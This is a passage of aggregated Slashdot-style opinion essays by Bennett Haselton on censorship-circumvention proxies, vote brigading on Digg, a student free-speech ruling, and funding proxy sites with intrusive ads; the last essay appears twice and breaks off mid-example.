    I write all of this as someone who also wrote a program a few years ago that was meant to serve as a more robust back-up, in case a more popular method of circumventing censorship ever got shut down by the censors. In my case, I thought that most censoring regimes would start blocking all popular Web proxy sites, so I wrote an install script called "Circumventor" that would let you set up a Web server and James Marshall's CGIProxy script on your home computer, turning it into a mini-Web-proxy site. I assumed that eventually, most people in censored countries would have to rely on someone in a non-censored country to set up a private Web proxy like this and e-mail them the URL, once China and Iran got their act together and started blocking most publicly known Web proxy sites. But that never happened, partly because Web proxy sites are now springing up faster than most censors' databases can keep up with. So the web proxy install script fell by the wayside -- but that's good news, because it means that nobody really needed it, since the simpler, more straightforward methods continued to work. Why pester your cousin in the U.S. to set up a Web proxy for you, when most Web proxies you can find in Google are not even blocked yet?

    And so it goes for Collage. It sounds like a perfectly fine idea, and it will be great news all around if nobody ever actually has to use it, because the censors never get around to blocking all of the simpler alternatives.

  10. Buried By The Brigade At Digg

    Tech · Social · · posted by CmdrTaco · from the because-they-can dept. · 624 comments
    Slashdot regular Bennett Haselton writes in with an essay on a subject we've dealt with internally at Slashdot for years: user abuses of social news... this time at Digg. He starts "Alternet uncovers evidence of a 'bury brigade' coordinating efforts to 'bury' left-leaning stories on Digg. Digg had previously announced that the 'bury' button will be removed from the next version of their site, to prevent these types of abuses, but that won't fix the real underlying issue — you can show mathematically that artificially promoting stories is just as harmful in the long run. Here's a simple fix that would address the real problem."

    Even if you just arrived from Mars and have never heard of Digg, that description of the service should make it obvious how easy it is to game the system, by rounding up groups of friends to vote on stories that you want to promote, or to bury stories that you want to kill. The former type of abuse (and it is abuse, under Digg's Terms of Use; search for "organized effort") is far more common, since people usually have more incentive (commercial or otherwise) to promote their own work than to bury someone else's. And in fact, Digg has announced that the next version of the service will remove the "bury" button, replacing it with a "Report" button for reporting bona fide cases of abuse, not just to bury boring stories.

    The thinking seems to be that abusive "digging" to promote a story, is less harmful than abusive "burying", and this has the ring of plausibility — that a creative effort is better than a destructive one. After all, Alternet had previously highlighted several artificial right-wing "digg brigades" mentioned in their story (Diggs And Buries, theliberalheretic, etc.), but they didn't blow the lid off of the situation until their report on the Digg Patriots bury brigade, as if to say, "Now we've found something really scandalous!" Annalee Newitz cheekily reported on how she bought votes to boost a story to the front page of Digg, but probably would have felt guilty if she'd hired a service to bury someone else's story. And when a Digg user organized an effort to bury Ron Paul stories that he thought were "spamming" the system, Ron Paul supporters protested that they were merely organizing to vote up stories they agreed with — the clear implication being that this was more honorable than organizing to vote stories down.

    But this, I think, is a fallacy. If a story's ranking is artificially inflated, then the extra eyeballs for that story have to come from somewhere, and they come from users paying less attention to the other stories that the phony up-and-comer pushed out of the way. Artificially bumping a story up is just as harmful as artificially burying a story, but the harm is distributed among many innocent victims, not just one. (By the same reasoning, in fact, you could argue that burying a story does no net harm to other users of the Digg site, because the harm done to one story is cancelled out by the benefit to all the other stories that rise in prominence when the victimized story is pushed out of the way. So by strict economic logic, recruiting friends to boost your own story at the expense of everyone else's, is actually more harmful than organizing a bury brigade!)

    So I don't think that Digg's replacing the "bury" button with a "report" button will fix the problem. For one thing, obviously groups could abuse the "report" button in the same way — issuing calls to action to report a story for violating the TOU. Since a flurry of bona fide abuse reports is presumably what Digg uses to identify and remove truly abusive stories like MLM spam, how are they going to tell the difference between these cases and cases of abusive "reporting"? (My suggestion: See if there is a sudden change in the percentage of users who view a story and make an abuse report. For stories that are genuine TOU violations, the percentage of users who "report" it should remain steady; for stories that are victimized by a "report brigade," you'll see a sudden spike in viewers and in the percentage of those viewers who report the story for abuse. This might have worked for detecting and stopping the bury brigades as well, although we'll never know now.)

    But more fundamentally, even if this change does stop the "bury/report brigades" from killing stories at will, that only fixes the most obvious symptom of the underlying problem, which is that the system can be gamed by recruiting your friends to vote either way. It won't stop "brigades" from artificially promoting shallow stories that agree with their opinions, which does the same net harm overall.

    Indeed, the most long-term harm that the DiggPatriots Yahoo Group might have done is that their cheating was so egregious that it makes other examples of cheating look benign by comparison, and might prevent people from realizing that "benign cheating" is just as harmful. As detailed in the Alternet report, the DiggPatriots group talked openly about cycling through different Digg accounts and circumventing bans on their IP addresses. The welcome message to the Yahoo Group told new users that the group was operating "under the radar." The group leader, a woman with the handle "bettverboten," talked about how to prevent Digg from monitoring their actions. And of course the vast majority of posts were calls to bury stories. But what if all of that had been inverted? If the group had operated in the open, while still focusing on recruiting conservative members? If each user limited to themselves to only one Digg account like they were supposed to? And if they focused not on burying stories, but on digging stories that promoted their viewpoints? Just as bad. It just doesn't sound as bad.

    I still think the only way to make Digg a true meritocracy, would be to use some version of an algorithm I outlined in an earlier article, inauspiciously titled "How to Stop Digg-cheating, Forever." The gist of it is that in addition to collecting votes from friends, stories should be shown to a random subset of users on the site (perhaps in a box that occasionally appears at the top of the screen when they're logged in), who are asked to vote it up or down. The votes of a random sampling of users would be more representative of how much value the story would have to the Digg community as a whole. Even if most users who are asked to vote on a "random story" simply ignore the request, all you need is to show the story to a large enough sample that you can measure the difference in responses to a truly good story vs. one that has been promoted by digg-cheaters. You don't necessarily have to run this procedure for every story, only the ones that are about to gain some benefit from a large number of diggs (such as being pushed to the front page), and you need to decide whether the story really deserves that big boost. The only way to game that system would be to organize a group of dedicated Digg users so enormous that they constituted a significant percentage of all users on the system — something pretty hard to do without getting caught.

    Still, the only site that I know of, that uses a version of this "random sampling" algorithm is HotOrNot.com, which lets you recruit your friends to vote on the "hotness" of your picture on a scale of 1 to 10 (by sending them a link to that specific picture), but also shows a stream of random pictures to visitors, so that your picture can collect votes from strangers. If the votes from the users who visit your picture via the link are significantly different from the votes from users who see your picture via the random stream, then HotOrNot discounts the votes from users who view your page via the link. This prevents digg-style gaming from people who want all their friends to give them a 10. (Note that if you think about it, this is essentially the same as always throwing out the votes from people who visit your picture via the link. If you collect votes from group A and B, but you only count the votes from group A if they agree with the votes from group B, then you're really only counting votes from group B! All the extra votes really give you is the ability to brag that X many people voted on your picture.)

    This seems like the simplest way to prevent Digg-cheating, although there may be others. Still unresolved is how to solve the general problem of "gaming" in traditional media and the blogosphere. For the foreseeable future, it's going to be the simple truth that if a major media outlet wants to run a story, it will be heard, and if no media outlet wants to run it, it won't be heard, regardless of how many viewers or readers would have voted in some hypothetical poll that, yes, they want to read that story, and yes, they liked it afterward. That's true for Internet articles as well, except to the extent that a deserving article might be rescued from obscurity by Digg, but the more that system can be gamed, the less it will reward articles that really deserve it. Digg is gameable because power users can recruit votes from their friends; the media and the blogosphere are so obviously "gameable" that we don't even call it "gameable," because "power users" — media outlets and A-list bloggers — can run whatever they want. Right now, the only way I can think of to change this situation that is even logically possible, would be for a site like Digg to adopt some version of the random-sampling algorithm, and to continue growing in power until a significant percentage of the public (not just Internet users, but everybody) relied on it for information. Then, if you had something important to say, people would hear it, but you wouldn't be able to cheat your way to the top.

    The ultimate irony is that Alternet's story may never have seen the light of day, if it hadn't been the beneficiary of the same gameable, non-meritocratic inefficiencies that exist in the media-blogo-outrage-o-sphere, just as they exist on Digg. Yes, the Alternet story deserved to be heard, but you don't get the publicity you deserve, you get the publicity that you organize, and Alternet had the organizational publicity structure in place to get their voice heard. If a kid blogging from his bedroom had infiltrated the Digg Patriots group and made essentially the same discovery, would anybody ever have heard about it? (Well, maybe, because of the political hot-button factor — but even then, only after the story had been picked up by a major site like Alternet.) A truly meritocratic Digg algorithm could make it possible to get a good story out without a lot of organizational support behind it — and to ensure that an organized effort can't kill a good story either.

  11. Suspension of Disbelief

    Yro · Editorial · · posted by CmdrTaco · from the not-the-kind-in-a-fluid dept. · 507 comments
    Frequent Slashdot Contributor Bennett Haselton writes in "A federal judge rules that a student can seek attorney's fees against a high school principal who suspended her for a Facebook page she made at home. Good news, but how could the school have thought they had the right to punish her for that in the first place? Posing the question not rhetorically but seriously. What is the source of society's attitudes toward the free-speech rights of 17-year-olds?"

    Well, you knew this post was coming when you read the news. A federal judge has ruled that Katie Evans, who had been suspended from high school for creating a Facebook group calling one of her teachers "the worst teacher I've ever met," can proceed with her suit seeking attorney's fees from her principal for violating her First Amendment rights. Evans, now a journalism student at the University of Florida, is represented in her suit by the ACLU of Florida.

    If any of the recent student online free-speech cases should have been adjudicated in the student's favor, this would most clearly be the one. As Judge Barry Garber wrote in his ruling, Evans's page did not contain threats of violence (if it had, it would have been a matter for the police, not for a school punishment), and the principal didn't even find out about the page until two months after she took it down. It's hard to believe that the principal's lawyers, if he consulted with them, would have gone along with a recommendation to suspend the student. And once the Florida ACLU contacted the principal, wouldn't he have realized that the longer he fought the case, the more legal bills the ACLU would amass, along with the possibility that the principal could be ordered to pay them? Even if he had estimated that there would only be a 5% chance that he could end up being ordered to pay legal fees, was it worth the risk, if the fees could come to thousands or tens of thousands of dollars? Well, now he knows.

    When a different judge ruled that a student had no right to challenge his suspension for making a vulgar Myspace page about his principal, I said that there was no more objective basis for saying that the ruling was legally "right" than it was "wrong," because if you put 10 judges in separate rooms and ask them how they would rule on the case, you could get 10 different, mutually contradictory answers. Well, fair is fair — even though I support Judge Garber's ruling 100%, I have to concede that it did not necessarily follow inevitably from the facts and the law, and there's no objective basis for calling it "the" right ruling. Judges are not like doctors who look at a mammogram, and draw on experience that the general public does not have, in order to see something that would be hidden from the rest of us. In cases like these, judges simply have multiple plausible interpretations in front of them, and they pick one. As such they're acting more like referees (who make a decision so that the game — or, in this case, society — can move on) than true "experts."

    There is a temptation to think that there is some consistent reasoning behind the different courts' rulings — say, that the student who created a vulgar page mocking his principal (the student was identified in papers only as "J.S.") went too far and crossed a line, while Katie Evans's page complaining about her teacher was clean enough to stay on the safe side of the line, and make her eligible for damages in a First Amendment suit. This, I think, is nonsense, an attempt to put a consistent theory on top of a legal system that does not follow consistent rules from one court ruling to the next. If different judges had been randomly assigned to J.S.'s case and Evans's case, then it might have been J.S. who won and Evans who lost. After all, it was a federal judge who once ruled that a Utah high school had the right to suspend a student for wearing sweatshirts emblazoned with "Vegan" and "Vegans Have First Amendment Rights." (The judge and the principal had apparently confused veganism with eco-terrorism.) How do you reconcile that with any of the recent rulings? (No prizes for guessing how that judge would have ruled if the shirts had said "Christian.")

    But even if it's still a roll of the dice how a court would rule in a particular student free-speech case, what matters from the point of view of a principal in a future case, are the potential payoffs. What if you're thinking about suspending a student for a non-threatening, non-libelous Facebook page? If the case ends up in court and you win, then you get the satisfaction of being "vindicated." But if you lose, you could be ordered to pay tens of thousands of dollars to the student's attorneys. So even a small number of victories for students in free-speech cases, even if mixed in with an equal or greater number of victories for the schools, still create an enormous incentive for a principal not to risk the case at all, when the potential gain is so small and the potential loss so huge. Even if you think there's only a 5% chance of being ordered to pay the student's $10,000 legal bill, that means you'd still have to decide if it's worth (on average) about $500 to get the satisfaction of suspending them.

    (On the other hand, if a student created a page that was so threatening or libelous towards a staff member, that the school would run the risk of being sued if the principal didn't suspend the student, then the school and the principal are taking some legal risk either way, but the risk involved in suspending the student is much smaller. Fine — there's nothing wrong with suspending a student for threats of violence.)

    So the ruling is a much more significant victory for student speech than many of the parties involved probably realize. Even though Judge Garber didn't actually award Evans her attorney's fees (yet?) — he only said that she could proceed to seek them against the principal — just the fact that it's coming dangerously close to that, means that principals in future cases now know what the risks are.

    But why was all this necessary? How did the legal and societal climate of attitudes toward people under 18, lead to a principal thinking that he could punish a 17-year-old for comments that she made about a teacher, on her own time, to a third-party audience? If the students in the school had been comprised, not of minors, but of adults from some other minority group — African Americans, immigrant women, native Spanish speakers — there's no question that the principal never would have thought he could get away with suspending the student for criticizing a teacher.

    Similarly, students at Harriton High School in Rosemont, Pennsylvania just discovered that school officials had given laptops to students to take home with remotely-activated webcams, that could be used to take photos in student's homes and transmit them back to school officials. Incredibly, this was discovered not by students or their parents examining the laptops, but because school officials used the feature to take a photo of a student in his bedroom, and then confronted him about "inappropriate" behavior, not considering that the students and their parents might consider it "inappropriate" that the school snuck spy cams into their bedrooms. (The school has issued a denial claiming, "At no time did any high school administrator have the ability or actually access the security-tracking software" — which doesn't seem to make sense, since the lawsuit was filed in the first place because the student was told by the assistant principal that the webcam had caught him engaging in "inappropriate behavior.") What was the school thinking? Probably, they were thinking, "These are minors, we can do what we want." If their student clientele had been comprised of adults, they never would have dreamed that they could confront a student about behavior in their room that they captured with a hidden camera. (Ironically, the school may end up in more trouble for spying on minors, as this editorial argues, since the school officials may now be guilty of recording and possessing child porn, depending on what the cameras "captured" in the students' rooms!)

    So no matter how much ink is spilled analyzing the legal technicalities of suspending a 17-year-old student for off-campus speech, that's not what the case is really about. The case is really about attitudes. Change society's attitudes to think of 17-year-olds the way we currently think of 25-year-olds, and no judge is going to deny them their right to criticize their school on their own time, any more than a judge in today's society would deny that right to a 25-year-old.

    And where does this attitude towards minors come from? I suspect that most people who believe that we have to draw the line somewhere around age 18, believe it for no better reason than because they were raised in a society where most other people believe it too. If you think that setting the cutoff age at 18 is just "common sense," then I would bet my house that if you had been raised in a society where the cutoff age was set at 13, that would seem like "just common sense" to you as well, and similarly if you had been raised in a society where the cutoff had been set at 22. This may seem like an unremarkable observation, but my belief in minors' rights has always been motivated by a more fundamental belief that you should not believe things merely because most people in your society believe them. If that sounds like a trite platitude, consider how few people in the US seem to question the rule that you can show a man's chest on television but not a woman's chest. In more liberal Denmark, supermarkets can stock tabloids at toddler-eye-level with photos of topless women on the cover, while in Saudi Arabia, adult women can't leave the house without covering their faces, and in all three societies, the majority thinks these regulations are just plain "common sense." Is the age of majority just another arbitrary illusion caused by the power of consensus?

    When I said this on The David Lawrence Show, the host made the thoughtful observation that most countries all over the world set the age of majority for most purposes at 18. Close, I said, but it doesn't quite prove what it seems to prove, because those globally diverse societies did not reach that conclusion independently — they move in similar directions because of cross-cultural influences. (The voting age was set at 21 in many democracies before many of them lowered it to 18 in the 1970's within a few years of each other.) To get a better sense of whether there is any merit to the idea, we'd have to do something like the "putting the 10 judges in 10 separate rooms" test — put 10 different societies in mutual isolation from each other, let them develop and debate things on their own, and see if all or most of them reach the conclusion that 18 us a good cutoff age for adulthood.

    The idea that actual children — under the age of, say, 11 — are qualitatively different from adults, has in fact been re-discovered by civilizations that developed independently at different points in history, all over the world. So there's probably something to it. The idea that teenagers are qualitatively different from adults, is something particular to recent history, and a wise person transported forward in time from the 1500's to the present day might scratch their heads and wonder why we think that 18-year-olds should be allowed to criticize their teachers but 17-year-olds cannot. I suspect the artificial extension of childhood grew out of the fact that because modern jobs are more complicated than they used to be, we need more years of schooling before we can go out and compete in the workforce. The fallacy there, though, is that just because we need more years of schooling, doesn't mean that the natural age of "human maturity" has gone up. So we end up with 17-year-olds having to go to court to establish their right to criticize their teachers on their own time.

    Judge Garber wouldn't have been in a position to make this argument in his ruling even if he agreed with it. But even if his ruling was based on logic that has nothing to do with the underlying case for minors' rights, it was still a step in the right direction.

  12. Power To the Pop-Ups

    Yro · Advertising · · posted by CmdrTaco · from the this'll-make-him-popular dept. · 204 comments
    Slashdot frequent contributor Bennett Haselton writes a piece advocating for Pop-Ups and even more obtrusive advertising. But not for the reasons you might think. He says "Annoying pop-up ads have been a great friend to Internet freedom, by enabling the operation of proxy sites that would be too expensive to operate otherwise. With the rising costs of making new proxy sites to stay ahead of the 'censorware' companies, even more intrusive ads could be an even bigger friend to Internet freedom. Got any ideas for how those more intrusive ads could work?" Clicky clicky below to read his point.

    Most news and information websites carry advertisements, but usually not more than one pop-up ad, if they have pop-ups at all. This is because the costs of running the sites are low enough that they can usually pay for their costs with revenue from regular ads. Surely the site owners would like the extra money that they could get from pop-ups, if their viewers had nowhere else to go. But if they tried to get away with too many pop-ups on a typical news site, visitors would just leave for their competitors' sites instead. Competition keeps the "prices" — in terms of the ads that you have to view in order to visit a website — low.

    By contrast, most proxy sites [that's not a link to one of my sites, so quit yer whining] — sites that you can use to get around Internet blocking, by using a form to type in the URL of the site that you want to access so the proxy site will fetch its contents for you — are festooned with pop-up ads, sometimes on every page load. As I can easily attest, the bandwidth and hardware costs of running a proxy site are sufficiently high that there would be no way to pay for the sites with the revenue from normal banner ads and AdSense blurbs. It's no exaggeration to say that most proxy sites, which enable people to circumvent government filtering in countries like China and Iran (not to mention helping millions of students get on Facebook and YouTube from school), would not exist without the pop-up ads to prop them up. (This may not be true of a proxy site that your high school classmate set up for himself and some friends, but it's true of most proxies created to serve a wide audience.)

    Unfortunately it's becoming more expensive to run an effective proxy service that enables users to get around most enterprise filtering programs. If it gets to the point where normal pop-up ads do not bring in enough revenue to pay for the service, we might need a new breed of even more intrusive (and better-paying) ads. More intrusive than the drop-down ads that play noisy videos. More intrusive than the Flash animations that crawl across the screen on top of the words you're trying to read. I'm going to argue that a company that figures out how to run the most intrusive ads of all, could be the new best friend of Internet freedom. But first a note about why the costs are increasing.

    Two years ago, I thought the cost of maintaining a proxy site to help people get around Internet filtering, would steadily fall, as bandwidth and processing power got cheaper. But bandwidth and hosting costs didn't drop as much as I had hoped, and the cost of maintaining an effective anti-filtering service has actually gone up, due to some advances made by Internet censoring programs. In 2007, the then-current versions of filtering programs like Smartfilter, Websense, and the 8e6 R3000 would typically only download updates to their blacklists once in the middle of the night. This meant that I could mail out a new proxy site to my proxy mailing list just after midnight, and it would be accessible to the mailing list subscribers all of the following day. (You wouldn't be able to get to them if your local network administrator subscribed to the mailing list and added the new sites to the local blacklist as soon as they came out, but most network admins didn't bother.) As of 2010, though, the latest versions of most enterprise filters are configured to automatically update their lists every hour or two. So to stay ahead of the filters, I have to mail out several sites every morning to different portions of the mailing list, so that the filtering companies generally learn about them and block them at different points throughout the day. Just registering several .com domains every day is not cheap. (GoDaddy sells .info domains for less than a dollar apiece, but this proved to be an ineffective solution because too many censored networks simply block all .info sites.)

    There are also the increasing costs of maintaining compatibility with complex sites like Facebook and YouTube. Accessing Facebook through a proxy is still a hit-or-miss proposition. (I steer my users toward accessing the mobile version of Facebook, http://m.facebook.com/ , through the proxy, because it's a stripped-down version built for compatibility with mobile devices, and this simpler version is less likely to break when accessed with a proxy script.) YouTube access depends mainly on whether the latest YouTube plugin for the Glype proxy script is compatible with the current YouTube interface, and likewise can be working one week and broken the next. It's not hard to run a proxy site that provides compatibility with the most popular sites that people want to access, but it takes real work -- you can't just upload the script and forget about it.

    (Many users in censored countries also use tools like Tor and UltraSurf to bypass their country's filters, but some of my contacts in those countries say that those tools are often too slow for them, so they end up using proxy sites instead. Since UltraSurf and Tor are free services, funded by donations and staffed by volunteers, the demand for those services can easily swell until they slow down from the overload.)

    So what happens if maintaining an effective anti-censorship service becomes too expensive to pay for using just pop-up ads? Well, you could charge money for using your proxy site, but that brings with it a whole host of other problems. You have to set recurring billing in order to be paid through PayPal or some similar service, and run the risk of your funds being frozen if someone files a crank complaint against you. If one user has a paid account, you have to worry about them sharing the account with their friends or posting the account credentials on a public message board. And there are many proxy operators (including me) who would like to think that the proxies do provide a valuable public service to the world, and wouldn't want to exclude people who can't afford the monthly access fee.

    I propose that ads which are even more intrusive than pop-ups -- thus grabbing more of the user's attention and providing more value to the advertiser, thus enabling them to pay more to sites which run the ads -- would enable proxy site operators to fund more of the costs of their operation, and hence would be a Good Thing. The existence of such intrusive ads does not mean that they would suddenly be plastered all over every proxy site. If your user base can be served for a lower cost, then you don't have to "charge" as much (in terms of advertisement intrusiveness) to use your proxy service. Over 90% of the traffic to my proxy sites is to domains that have already been blocked a long time ago by Websense, Smartfilter, Lightspeed, and most of the rest of the censorware companies. Apparently there are a lot of users who are on censored networks and who need proxies, but whose network admins just haven't updated the blacklists in a very long time, or who haven't paid the subscription fee to keep downloading database updates. Since you don't need to register 10 new domain names every day to serve that audience, there would continue to be proxies for those users with less-intrusive ads on them. But the more-intrusive (and higher-paying) ads would also enable proxy webmasters to serve a "higher-end" audience, the ones who need several new sites every day, to stay ahead of the more frequently-updated filters.

    I can think of several ways that more intrusive ads might work. My favorite would be a "quiz" model wherein a drop-down advertisement appears in front of the site you're trying to access, consisting of some promotional content, and a little form at the bottom. In order to make the drop-down ad disappear, you have to read the ad and fill in the answers to some one-word questions or multiple-choice questions about the content, to prove you actually read it.

    Perhaps I'm biased in favor of this idea because I'm tired of ads that contain splashy graphics and expensively licensed music and never contain any actual information. The only television ad that I can recall viewing in the past year which prompted me to actually buy the advertiser's product, was the Pizza Hut ad announcing that you could get a large pizza with any number of toppings for $10. That's what I want in an ad. I give you $10. You give me a pizza. (And this extra plug for their $10 pizza promotion, can be considered a thank-you to them for running an ad that actually had something to say.) Most ads on TV are far less informative, serving mostly to give a glossy sheen to the advertiser's brand name. Yet these ads are paid for by corporations who do the market research and the focus grouping, so the ads must work. Many economists, including Tim Harford in The Undercover Economist and Steven Landsburg in The Armchair Economist, have explained why companies pay for ads that do nothing except look expensive: Because they prove to the viewer that the company intends to be around for a long time, in order to capitalize on the long-term exposure given to them by the ad. This has become so standard that making an ad which actually gives the user information seems tawdry by comparison. The most ghetto-sounding word in TV advertising is "infomercial".

    But I think that some companies could benefit from greater exposure of actual information about their product, just as there are companies that pay for informercials. And if a company like Linksys really wanted to run a splashy ad that contained no actual information, and then make me answer some questions at the bottom like:

    Linksys is:
    (a) the leading manufacturer of wireless adapter cards
    (b) the leading manufacturer of wireless routers
    (c) the leading manufacturer of wireless monitoring cameras
    (d) all of the above!!!

    then that's their prerogative. The quiz-advertisement model only says that advertisers can require users to answer a question before closing the ad; it would be up to the advertiser to decide what question works best. I suspect that the actual-information model would work better for quiz ads, but advertisers could try both and see what works.

    There are already some websites that require you to "complete an offer" (i.e. become a customer of some third-party company, at least for a free trial period) in order to use their services, but most proxy sites have so far declined to carry advertisements like these. Evidently their users consider this too high of a price to pay to access a proxy site. Filling out an offer is not just time-consuming, but leaves the door open to future problems -- will they sell your name or your e-mail address? Will they make it hard to cancel your "free trial", and then start billing you? The problem seems to be that there is too large of a gap between the "fees" associated with the two options -- a normal advertisement doesn't bring enough money to the proxy operator, but a complete-an-offer advertisement is such a steep price that most users won't pay it. The "quiz ad" is like a "fee" that falls nicely in the middle -- a smaller time commitment, and your worries are over after you fill in the quiz and hit submit.

    If the very thought of such an ad still seems too annoying for words, then I think that objection misses the point. If the revenue from "normal" ads (pop-ups, drop-downs, AdSense widgets) is enough to pay for the operation of a "high-end" proxy service (catering to the people who need several new proxies every day), then such proxy services with "normal" ads will continue to exist. Indeed, anyone who tried running the more annoying "quiz ads" would not be able to get off the ground, because users would flock to the competing proxy sites using normal ads instead. If "high-end" proxy services flourished that were using quiz ads, it would only be because you simply can't provide a high-end service for less money than the quiz ads are bringing in.

    It's possible that some advertisers would be reluctant to display ads in a manner that users would continue an annoying obstacle, but I'm not sure that's really a problem. The most intrusive advertisements currently in use on mainstream websites are probably the "premercials" that display before some news videos on CNN.com and other news sites. Unlike drop-down ads which can be closed with the click of a button, the video pre-mercials can't be skipped. Since you're actually expecting the news video to come up immediately when you click the link to start playing the video, you would think that many users would grit their teeth in annoyance upon seeing the "pre-mercial", and transfer that irritation to the advertiser's brand name, but there are so many big-name companies buying those pre-mercials that they must believe it's having a positive effect. So intrusiveness itself doesn't seem to tarnish a brand.

    But I don't propose to micro-manage suggestions for how the more intrusive ads would look, or how advertisers should tailor their ads to fit the format. I'm just saying that a new breed of more intrusive ads, even more annoying than pop-ups, might be just what we need to stay ahead of increasingly sophisticated Internet censors. It's still technically quite trivial to release a steady stream of new proxy sites that defeat most Internet filters, but it costs money to buy domains and maintain the service, and the money has to come from somewhere.

  13. Power To the Pop-Ups

    Yro · Advertising · · posted by CmdrTaco · from the this'll-make-him-popular dept. · 204 comments
    Slashdot frequent contributor Bennett Haselton writes a piece advocating for Pop-Ups and even more obtrusive advertising. But not for the reasons you might think. He says "Annoying pop-up ads have been a great friend to Internet freedom, by enabling the operation of proxy sites that would be too expensive to operate otherwise. With the rising costs of making new proxy sites to stay ahead of the 'censorware' companies, even more intrusive ads could be an even bigger friend to Internet freedom. Got any ideas for how those more intrusive ads could work?" Clicky clicky below to read his point.

    Most news and information websites carry advertisements, but usually not more than one pop-up ad, if they have pop-ups at all. This is because the costs of running the sites are low enough that they can usually pay for their costs with revenue from regular ads. Surely the site owners would like the extra money that they could get from pop-ups, if their viewers had nowhere else to go. But if they tried to get away with too many pop-ups on a typical news site, visitors would just leave for their competitors' sites instead. Competition keeps the "prices" — in terms of the ads that you have to view in order to visit a website — low.

    By contrast, most proxy sites [that's not a link to one of my sites, so quit yer whining] — sites that you can use to get around Internet blocking, by using a form to type in the URL of the site that you want to access so the proxy site will fetch its contents for you — are festooned with pop-up ads, sometimes on every page load. As I can easily attest, the bandwidth and hardware costs of running a proxy site are sufficiently high that there would be no way to pay for the sites with the revenue from normal banner ads and AdSense blurbs. It's no exaggeration to say that most proxy sites, which enable people to circumvent government filtering in countries like China and Iran (not to mention helping millions of students get on Facebook and YouTube from school), would not exist without the pop-up ads to prop them up. (This may not be true of a proxy site that your high school classmate set up for himself and some friends, but it's true of most proxies created to serve a wide audience.)

    Unfortunately it's becoming more expensive to run an effective proxy service that enables users to get around most enterprise filtering programs. If it gets to the point where normal pop-up ads do not bring in enough revenue to pay for the service, we might need a new breed of even more intrusive (and better-paying) ads. More intrusive than the drop-down ads that play noisy videos. More intrusive than the Flash animations that crawl across the screen on top of the words you're trying to read. I'm going to argue that a company that figures out how to run the most intrusive ads of all, could be the new best friend of Internet freedom. But first a note about why the costs are increasing.

    Two years ago, I thought the cost of maintaining a proxy site to help people get around Internet filtering, would steadily fall, as bandwidth and processing power got cheaper. But bandwidth and hosting costs didn't drop as much as I had hoped, and the cost of maintaining an effective anti-filtering service has actually gone up, due to some advances made by Internet censoring programs. In 2007, the then-current versions of filtering programs like Smartfilter, Websense, and the 8e6 R3000 would typically only download updates to their blacklists once in the middle of the night. This meant that I could mail out a new proxy site to my proxy mailing list just after midnight, and it would be accessible to the mailing list subscribers all of the following day. (You wouldn't be able to get to them if your local network administrator subscribed to the mailing list and added the new sites to the local blacklist as soon as they came out, but most network admins didn't bother.) As of 2010, though, the latest versions of most enterprise filters are configured to automatically update their lists every hour or two. So to stay ahead of the filters, I have to mail out several sites every morning to different portions of the mailing list, so that the filtering companies generally learn about them and block them at different points throughout the day. Just registering several .com domains every day is not cheap. (GoDaddy sells .info domains for less than a dollar apiece, but this proved to be an ineffective solution because too many censored networks simply block all .info sites.)

    There are also the increasing costs of maintaining compatibility with complex sites like Facebook and YouTube. Accessing Facebook through a proxy is still a hit-or-miss proposition. (I steer my users toward accessing the mobile version of Facebook, http://m.facebook.com/ , through the proxy, because it's a stripped-down version built for compatibility with mobile devices, and this simpler version is less likely to break when accessed with a proxy script.) YouTube access depends mainly on whether the latest YouTube plugin for the Glype proxy script is compatible with the current YouTube interface, and likewise can be working one week and broken the next. It's not hard to run a proxy site that provides compatibility with the most popular sites that people want to access, but it takes real work -- you can't just upload the script and forget about it.

    (Many users in censored countries also use tools like Tor and UltraSurf to bypass their country's filters, but some of my contacts in those countries say that those tools are often too slow for them, so they end up using proxy sites instead. Since UltraSurf and Tor are free services, funded by donations and staffed by volunteers, the demand for those services can easily swell until they slow down from the overload.)

    So what happens if maintaining an effective anti-censorship service becomes too expensive to pay for using just pop-up ads? Well, you could charge money for using your proxy site, but that brings with it a whole host of other problems. You have to set recurring billing in order to be paid through PayPal or some similar service, and run the risk of your funds being frozen if someone files a crank complaint against you. If one user has a paid account, you have to worry about them sharing the account with their friends or posting the account credentials on a public message board. And there are many proxy operators (including me) who would like to think that the proxies do provide a valuable public service to the world, and wouldn't want to exclude people who can't afford the monthly access fee.

    I propose that ads which are even more intrusive than pop-ups -- thus grabbing more of the user's attention and providing more value to the advertiser, thus enabling them to pay more to sites which run the ads -- would enable proxy site operators to fund more of the costs of their operation, and hence would be a Good Thing. The existence of such intrusive ads does not mean that they would suddenly be plastered all over every proxy site. If your user base can be served for a lower cost, then you don't have to "charge" as much (in terms of advertisement intrusiveness) to use your proxy service. Over 90% of the traffic to my proxy sites is to domains that have already been blocked a long time ago by Websense, Smartfilter, Lightspeed, and most of the rest of the censorware companies. Apparently there are a lot of users who are on censored networks and who need proxies, but whose network admins just haven't updated the blacklists in a very long time, or who haven't paid the subscription fee to keep downloading database updates. Since you don't need to register 10 new domain names every day to serve that audience, there would continue to be proxies for those users with less-intrusive ads on them. But the more-intrusive (and higher-paying) ads would also enable proxy webmasters to serve a "higher-end" audience, the ones who need several new sites every day, to stay ahead of the more frequently-updated filters.

    I can think of several ways that more intrusive ads might work. My favorite would be a "quiz" model wherein a drop-down advertisement appears in front of the site you're trying to access, consisting of some promotional content, and a little form at the bottom. In order to make the drop-down ad disappear, you have to read the ad and fill in the answers to some one-word questions or multiple-choice questions about the content, to prove you actually read it.

    Perhaps I'm biased in favor of this idea because I'm tired of ads that contain splashy graphics and expensively licensed music and never contain any actual information. The only television ad that I can recall viewing in the past year which prompted me to actually buy the advertiser's product, was the Pizza Hut ad announcing that you could get a large pizza with any number of toppings for $10. That's what I want in an ad. I give you $10. You give me a pizza. (And this extra plug for their $10 pizza promotion, can be considered a thank-you to them for running an ad that actually had something to say.) Most ads on TV are far less informative, serving mostly to give a glossy sheen to the advertiser's brand name. Yet these ads are paid for by corporations who do the market research and the focus grouping, so the ads must work. Many economists, including Tim Harford in The Undercover Economist and Steven Landsburg in The Armchair Economist, have explained why companies pay for ads that do nothing except look expensive: Because they prove to the viewer that the company intends to be around for a long time, in order to capitalize on the long-term exposure given to them by the ad. This has become so standard that making an ad which actually gives the user information seems tawdry by comparison. The most ghetto-sounding word in TV advertising is "infomercial".

    But I think that some companies could benefit from greater exposure of actual information about their product, just as there are companies that pay for informercials. And if a company like Linksys really wanted to run a splashy ad that contained no actual information, and then make me answer some questions at the bottom like:

    Linksys is:
    (a) the leading manufacturer of wireless adapter cards
    (b) the leading manufacturer of wireless routers
    (c) the leading manufacturer of wireless monitoring cameras
    (d) all of the above!!!

